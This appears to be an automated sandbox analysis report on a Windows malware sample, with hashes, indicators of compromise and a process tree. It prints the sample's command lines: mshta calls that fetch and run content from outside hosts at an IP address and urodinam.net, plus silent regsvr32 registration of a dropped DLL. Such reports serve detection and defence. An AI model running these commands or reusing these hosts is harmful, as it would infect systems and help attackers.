Analysis
-
max time kernel
141s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
30/11/2024, 05:11
Behavioral task
behavioral1
Sample
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe
Resource
win7-20240708-en
General
-
Target
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe
-
Size
31KB
-
MD5
ab30aae35c2c14af366a5647ca1e53e1
-
SHA1
8d30e8b000e09763e18c3b330a91cccd5e5770da
-
SHA256
ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c
-
SHA512
b01ea5f06121288b966ecd5e84d146ab3dddd1a23a2b3ea135607a69b2c9c309a6d8833664ab231247415adf1b7b9edb91337e12f9a508b52914c48ce323cb94
-
SSDEEP
768:sYzkFZqKKeZOyYMY1J4UWPknF0KaHw2PQUbj3m1hv9:YFIeZRYMIJSPkF0KaHFQ8shF
Malware Config
Extracted
http://95.211.27.154/install.php?id=02944
Extracted
http://urodinam.net/8732489273.php
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 2640 mshta.exe 9 2668 mshta.exe 11 2668 mshta.exe 14 2668 mshta.exe 19 2640 mshta.exe -
Executes dropped EXE 2 IoCs
pid Process 2592 dll.exe 2608 32.exe -
Loads dropped DLL 4 IoCs
pid Process 944 cmd.exe 944 cmd.exe 944 cmd.exe 944 cmd.exe -
resource yara_rule behavioral1/memory/2084-0-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2084-19-0x0000000000400000-0x0000000000419000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\ C:\Users\Admin\AppData\Local\Temp\hlp.dll dll.exe File created C:\Users\Admin\AppData\Local\Temp\ C:\Users\Admin\AppData\Local\Temp\temp.exe 32.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2084 wrote to memory of 2640 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 2084 wrote to memory of 2640 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 2084 wrote to memory of 2640 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 2084 wrote to memory of 2640 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 30 PID 2084 wrote to memory of 2668 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 2084 wrote to memory of 2668 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 2084 wrote to memory of 2668 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 2084 wrote to memory of 2668 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 31 PID 2084 wrote to memory of 944 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 32 PID 2084 wrote to memory of 944 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 32 PID 2084 wrote to memory of 944 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 32 PID 2084 wrote to memory of 944 2084 ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe 32 PID 944 wrote to memory of 2592 944 cmd.exe 34 PID 944 wrote to memory of 2592 944 cmd.exe 34 PID 944 wrote to memory of 2592 944 cmd.exe 34 PID 944 wrote to memory of 2592 944 cmd.exe 34 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 1504 944 cmd.exe 36 PID 944 wrote to memory of 2608 944 cmd.exe 37 PID 944 wrote to memory of 2608 944 cmd.exe 37 PID 944 wrote to memory of 2608 944 cmd.exe 37 PID 944 wrote to memory of 2608 944 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe"C:\Users\Admin\AppData\Local\Temp\ea88759df2b65f7904b998d5bbfae17dc3bca11b05c889e7043770298c7b645c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\mshta.exemshta http://95.211.27.154/install.php?id=029442⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2640
-
-
C:\Windows\SysWOW64\mshta.exemshta http://urodinam.net/8732489273.php2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\temp.bat2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Local\Temp\dll.exeC:\Users\Admin\AppData\Local\Temp\dll.exe C:\Users\Admin\AppData\Local\Temp\hlp.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:2592
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\hlp.dll3⤵
- System Location Discovery: System Language Discovery
PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\32.exeC:\Users\Admin\AppData\Local\Temp\32.exe C:\Users\Admin\AppData\Local\Temp\temp.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:2608
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5892eb2047d566f2e0288ecd98e150a4a
SHA1557020450be4ca2e19dec021865b4ca14fc032d6
SHA25656608e8b3bf96e9a1644c819713b6de1511002aeaa41299fe0dfd136f63ab635
SHA51200db937ff6f337ccca134575cd4e159a5112c69e1347a09295ef31120fe465c1aa41d660c1fd6064cc524b98496a6cbe32cc731cc14245bc783ca6c2ef69bbe1
-
Filesize
284B
MD523f055817c526491f40ed984f0fbdf7a
SHA16610dbcb67418435134ccf65aa7fae786cebef49
SHA256a8c56d888219ada4d7064537f9fba2c05cac10ec552758e6d02d89da5d8e67fd
SHA512d8a1abd46114026ae525c1aa45579b32980ac568450313f7911cf45b97025a244dec0b85dcbc41798145af23aef6cd312e2f556692c4338637f51fe83cf044b4
-
Filesize
3KB
MD567e233f1b51099732474c59d3d9c179b
SHA15585c79a211e4882096f753d79e0814f9f9bd5d7
SHA25666ea418d861239407dd5b524c6443404b2e27b45097a585b4257e79666f859e4
SHA512e54ce43b78e18b0632e4dba9e23afddbc5080fe837d31920bf51da11d8da535a84c10f65098e32e5cf27ffbf78bd9d283e88baeebd362f6855ddb0adcc83d45e